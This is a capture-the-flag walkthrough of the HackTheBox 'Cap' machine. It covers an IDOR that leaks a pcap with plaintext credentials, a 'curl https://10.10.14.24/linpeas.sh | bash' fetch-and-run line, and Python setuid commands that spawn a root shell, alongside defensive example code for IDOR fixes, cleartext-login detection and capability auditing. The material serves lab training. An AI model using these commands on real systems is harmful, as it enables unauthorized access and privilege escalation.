HackTheBox machine "Cap"

Description

The machine "Cap" is a Linux-based system rated easy difficulty. It hosts an HTTP server built for administrative tasks, one of which is a network capture feature. Weak access control on that feature leads to an Insecure Direct Object Reference (IDOR) vulnerability, which lets an unauthorized user download network captures belonging to other users. Analyzing such a capture file reveals plaintext credentials, which give an attacker an initial foothold on the system. To escalate privileges and obtain root access, a specific Linux capability is exploited, further highlighting the misconfigurations present on the system.

Skills Required

  1. Web Enumeration
  2. Packet Capture Analysis

Skills Learned

  1. IDOR
  2. Exploiting Linux Capabilities

Analysis

Step 1: Run an nmap scan against the 10.129.17.215 IP address with the following options:

-Pn: Skip host discovery (the ping probe) and go straight to port scanning, treating the host as up.

-sC: Run nmap's default script set, the standard safe checks that probe and fingerprint common services.

-sV: Perform service version detection, which reports which services, and which versions of them, are listening on each open port.

Step 2: FTP (File Transfer Protocol)

Let's check whether FTP allows anonymous access.

The login attempt fails, which indicates that anonymous access is disabled. Let's shift our focus to the HTTP server and explore it next.

Step 3: HTTP (Hypertext Transfer Protocol)

Nmap shows that port 80 is running Gunicorn, a Python-based HTTP server. When we visit the page, it loads a dashboard.

Browsing to the IP Config page reveals the output of ifconfig.

Similarly, the Network Status page reveals the output of netstat. This suggests that the application executes system commands on the server. Clicking the Security Snapshot menu item pauses the page for a few seconds and then returns the page shown below.

Step 4: The snapshot is served from /data/0, where the numeric ID in the path is the direct object reference from the description, and it contains some captured data. Let's download the pcap and analyze it with Wireshark.
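The numeric ID in /data/<id> is the direct object reference the description calls out. As an added example, not the Cap application's own code, here is a minimal Python model of the vulnerable lookup beside two hardened versions: a per-request ownership check, and an opaque per-capture token so IDs cannot be enumerated at all. CaptureStore and the CAPTURE_OWNERS / CAPTURE_FILES tables are constructed for illustration.

```python
import secrets
from http import HTTPStatus

# Constructed sample data: which user owns which capture ID (not the real app's storage).
CAPTURE_OWNERS = {0: "admin", 1: "nathan", 2: "nathan"}
CAPTURE_FILES = {0: b"pcap-of-admin", 1: b"pcap-of-nathan-1", 2: b"pcap-of-nathan-2"}


def get_capture_vulnerable(user, capture_id):
    """IDOR: the ID from the URL (/data/<id>) is used directly, so any logged-in
    user can fetch any capture just by changing the number."""
    if capture_id not in CAPTURE_FILES:
        return HTTPStatus.NOT_FOUND, None
    return HTTPStatus.OK, CAPTURE_FILES[capture_id]


def get_capture_fixed(user, capture_id):
    """Hardened: confirm the requester owns the object before returning it.
    Answer 404 rather than 403 so the existence of other IDs is not leaked."""
    if CAPTURE_OWNERS.get(capture_id) != user:
        return HTTPStatus.NOT_FOUND, None
    return HTTPStatus.OK, CAPTURE_FILES[capture_id]


class CaptureStore:
    """Hardened further: captures are addressed by an unguessable token that is
    still tied to an owner, so neither enumeration nor ownership bypass works."""

    def __init__(self):
        self._by_token = {}  # token -> (owner, data)

    def add(self, owner, data):
        token = secrets.token_urlsafe(16)  # 128 bits of randomness, not sequential
        self._by_token[token] = (owner, data)
        return token

    def get(self, user, token):
        entry = self._by_token.get(token)
        if entry is None or entry[0] != user:  # unknown token or not the owner
            return HTTPStatus.NOT_FOUND, None
        return HTTPStatus.OK, entry[1]
```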


Step 5: The traffic is not encrypted, so the user's credentials, nathan / Buck3tH4TF0RM3!, can be read straight out of the capture. These turn out to be valid not only for FTP but also for logging in via SSH.
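To show what the Wireshark step finds, here is an added Python example (not part of the original write-up) that parses a classic pcap file with only the standard library and flags FTP USER/PASS commands sent in cleartext. The capture it scans is constructed inline, not the machine's real capture, and the credentials in it are made up.

```python
import struct


def _tcp_frame(src_ip, dst_ip, sport, dport, payload):
    """Build one Ethernet/IPv4/TCP frame (checksums left at 0; fine for a sample)."""
    eth = b"\x02" * 6 + b"\x04" * 6 + struct.pack("!H", 0x0800)
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 8192, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 1, 0, 64, 6, 0,
                     bytes(map(int, src_ip.split("."))), bytes(map(int, dst_ip.split("."))))
    return eth + ip + tcp


def build_pcap(frames):
    """Wrap frames in a classic little-endian pcap (magic 0xa1b2c3d4, linktype 1 = Ethernet)."""
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    for i, f in enumerate(frames):
        out += struct.pack("<IIII", 1000 + i, 0, len(f), len(f)) + f
    return out


def find_cleartext_logins(pcap):
    """Walk every record in a pcap and report FTP USER/PASS commands in TCP payloads."""
    magic, = struct.unpack_from("<I", pcap)
    endian = "<" if magic == 0xA1B2C3D4 else ">"
    pos, hits = 24, []
    while pos + 16 <= len(pcap):
        _, _, incl, _ = struct.unpack_from(endian + "IIII", pcap, pos)
        frame = pcap[pos + 16: pos + 16 + incl]
        pos += 16 + incl
        if len(frame) < 34 or frame[12:14] != b"\x08\x00" or frame[23] != 6:
            continue  # not IPv4 over TCP
        ihl = (frame[14] & 0x0F) * 4
        tcp = frame[14 + ihl:]
        dport = struct.unpack_from("!H", tcp, 2)[0]
        payload = tcp[(tcp[12] >> 4) * 4:]  # skip the TCP header (data offset field)
        for line in payload.decode("ascii", "replace").splitlines():
            if dport == 21 and line.split(" ")[0] in ("USER", "PASS"):
                src = ".".join(map(str, frame[26:30]))
                dst = ".".join(map(str, frame[30:34]))
                hits.append((src, dst, line))
    return hits


# Constructed sample capture: a cleartext FTP login (not the machine's real pcap).
SAMPLE_PCAP = build_pcap([
    _tcp_frame("192.0.2.10", "192.0.2.20", 40001, 21, b"USER alice\r\n"),
    _tcp_frame("192.0.2.20", "192.0.2.10", 21, 40001, b"331 Please specify the password.\r\n"),
    _tcp_frame("192.0.2.10", "192.0.2.20", 40001, 21, b"PASS s3cret\r\n"),
])
```

The same scanner can be pointed at a real file with `find_cleartext_logins(open(path, "rb").read())`; a hit is the signal that the service should be moved to an encrypted protocol.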

Step 6: Privilege Escalation

From our shell on Cap, we can fetch linpeas.sh with curl and pipe the output directly into bash to execute it:

curl https://10.10.14.24/linpeas.sh | bash

linpeas surfaces a Linux capability that allows the Python interpreter to change its own user ID, so the following Python commands result in a root shell:

  1. import os
  2. os.setuid(0)
  3. os.system("/bin/bash")

os.setuid(0) calls setuid(), which is used to modify the process user identifier (UID); with that capability in effect, the unprivileged interpreter is permitted to switch to UID 0 before spawning the shell.
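From the defender's side, the misconfiguration is a file capability granted to a general-purpose interpreter. Here is an added Python example (not from the page or from linpeas) that parses getcap -r output, in both the older "path = caps" and the newer "path caps" formats, and flags dangerous capabilities as well as any capability granted to an interpreter. The sample lines are constructed, and the audit_host helper assumes getcap is installed locally.

```python
import re
import subprocess

# Capabilities that let a binary step outside normal user boundaries (not exhaustive).
DANGEROUS = {"cap_setuid", "cap_setgid", "cap_dac_override", "cap_dac_read_search",
             "cap_sys_admin", "cap_sys_ptrace", "cap_sys_module", "cap_chown", "cap_fowner"}
# Generic interpreters: any capability on these is effectively handed to every script they run.
INTERPRETERS = re.compile(r"/(python[0-9.]*|perl[0-9.]*|ruby[0-9.]*|node|php[0-9.]*)$")


def parse_getcap_line(line):
    """Accept 'path = caps' (older libcap) and 'path caps' (libcap >= 2.41).
    Returns (path, {cap_name, ...}) or None for lines that are not findings."""
    m = re.match(r"^(\S+)\s*=?\s*(cap_.+)$", line.strip())
    if not m:
        return None
    path, capstr = m.group(1), m.group(2)
    caps = set()
    for clause in capstr.split():              # e.g. "cap_net_admin,cap_net_raw+eip"
        names = re.split(r"[=+-]", clause)[0]  # drop the flag part (e/p/i)
        caps.update(c for c in names.split(",") if c.startswith("cap_"))
    return path, caps


def audit(lines):
    """Return (path, sorted dangerous caps, is_interpreter) for each risky getcap line."""
    findings = []
    for line in lines:
        parsed = parse_getcap_line(line)
        if not parsed:
            continue
        path, caps = parsed
        risky = sorted(caps & DANGEROUS)
        is_interp = bool(INTERPRETERS.search(path))
        if risky or is_interp:
            findings.append((path, risky, is_interp))
    return findings


def audit_host():
    """Run getcap -r / on the local system and audit its output (assumes libcap tools)."""
    proc = subprocess.run(["getcap", "-r", "/"], capture_output=True, text=True)
    return audit(proc.stdout.splitlines())


# Constructed sample output (not taken from the machine): lines of the kind linpeas surfaces.
SAMPLE = ["/usr/bin/ping = cap_net_raw+ep",
          "/usr/bin/python3.8 = cap_setuid+ep",
          "/usr/bin/mtr-packet cap_net_raw=ep"]
```

A non-empty result from audit_host() is what to act on: remove the capability with `setcap -r <path>` or move the privileged operation into a dedicated, non-interpreter binary.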

Thank you for visiting.


Samuel isenin

Cybersecurity | SOC Analyst | Penetration Test | Ethical Hacking | Python Dev | Web3 | Blockchain | Financial Analyst | Linux System

6 months

Great work

Sujeet Bharti

C || Java || Python || DSA || HTML || CSS || Networking || Cybersecurity enthusiasm

6 months

Very helpful!
